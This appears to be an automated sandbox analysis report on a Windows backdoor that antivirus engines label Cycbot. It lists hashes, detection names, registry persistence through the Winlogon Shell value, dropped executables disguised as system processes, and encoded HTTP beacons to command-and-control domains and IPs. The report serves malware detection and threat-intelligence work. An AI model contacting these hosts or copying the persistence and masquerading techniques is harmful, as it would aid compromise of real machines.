Analysis Date: 2015-01-12 12:32:52
MD5: b5b4d95f5b75ea6f8ecaacf07ed3c1ea
SHA1: 6f00a842477528fee82a3ba357d65dc9e9f553e9

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: de66dd56e0b8f8bbac717e748b9a5899 sha1: 3f4d792311425756fd6abb7f613ab8c3413c06ce size: 103424
Section: .tls md5: de8a5a5ecb0c0803a6b6e62143053ffd sha1: 1e111b40de047fc65bfdddabdf9d3f6742276863 size: 1536
Section: .data md5: f5fa46aae541afb83091067bb0c2925a sha1: 80ee711ea62ea3405e5441b14d6d4155af9380f2 size: 74240
Section: .reloc md5: 0a1fd1adc3dda5be4ec808c7da076ad1 sha1: b2fb9c1b86b554551dc8818c4790b18df43581fd size: 1024
Timestamp: 2005-09-02 06:25:42
PEhash: f148551deefed0f5269d56d6087cb323d8ad88aa
IMPhash: 65f160f364647c13264afaff36d3eb52
AV: 360 Safe - no_virus
AV: Ad-Aware - Gen:Heur.Conjar.9
AV: Alwil (avast) - Cybota [Trj]
AV: Arcabit (arcavir) - Gen:Heur.Conjar.9
AV: Authentium - W32/Goolbot.J.gen!Eldorado
AV: Avira (antivir) - TR/Crypt.XPACK.Gen
AV: BullGuard - Gen:Heur.Conjar.9
AV: CA (E-Trust Ino) - Win32/FakeAlert.J!generic
AV: CAT (quickheal) - Backdoor.Cycbot.B
AV: ClamAV - Win.Trojan.Cycbot-7001
AV: Dr. Web - Trojan.DownLoader4.13967
AV: Emsisoft - Gen:Heur.Conjar.9
AV: Eset (nod32) - Win32/Kryptik.QSU
AV: Fortinet - W32/Cycbot.AF!tr.dldr
AV: Frisk (f-prot) - W32/Goolbot.J.gen!Eldorado
AV: F-Secure - Gen:Heur.Conjar.9
AV: Grisoft (avg) - Agent_r.ALA
AV: Ikarus - Backdoor.Win32.Cycbot
AV: K7 - Backdoor ( 003210941 )
AV: Kaspersky - Trojan.Win32.Generic
AV: MalwareBytes - Backdoor.Bot
AV: Mcafee - BackDoor-EXI.gen.k
AV: Microsoft Security Essentials - Backdoor:Win32/Cycbot.G
AV: MicroWorld (escan) - Gen:Heur.Conjar.9
AV: Rising - no_virus
AV: Sophos - Troj/FakeAV-EFL
AV: Symantec - Trojan.Gen
AV: Trend Micro - BKDR_CYCBOT.SME3
AV: VirusBlokAda (vba32) - no_virus

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝ explorer.exe,C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Mutex: {45BCA615-C82A-4152-8857-BCC626AE4C8D}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {1ACD3490-8843-47EB-867B-EDDDD7FA37FD}
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: {6988405C-71C3-427c-975A-0398706E79EE}
Creates Mutex: {35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNS: 127.0.0.1
Winsock DNS: happyratatuy.com
Winsock DNS: mysmallhomespace.com
Winsock DNS: crazyleafdesign.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates Process: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNS: crazyleafdesign.com (Type: A) ➝ 199.201.88.112
DNS: zonedg.com (Type: A) ➝ 141.8.225.80
DNS: zonedg.com (Type: A) ➝ 141.8.225.80
DNS: mysmallhomespace.com (Type: A)
DNS: happyratatuy.com (Type: A)
HTTP GET: http://crazyleafdesign.com/blog/images/share/facebook.png?v4=64&tq=gJ4WK%2FSUh%2FzMhRMw9YLJ8MSTUivqg4b8zZJEfqHXarVJ%2BQhhCA0%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1tX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1tX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJsX%2BSNxlKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1tX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJuX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1tX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxlKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP: 192.168.1.1:1031 ➝ 199.201.88.112:80
Flows TCP: 192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1036 ➝ 141.8.225.80:80

Raw Pcap

Strings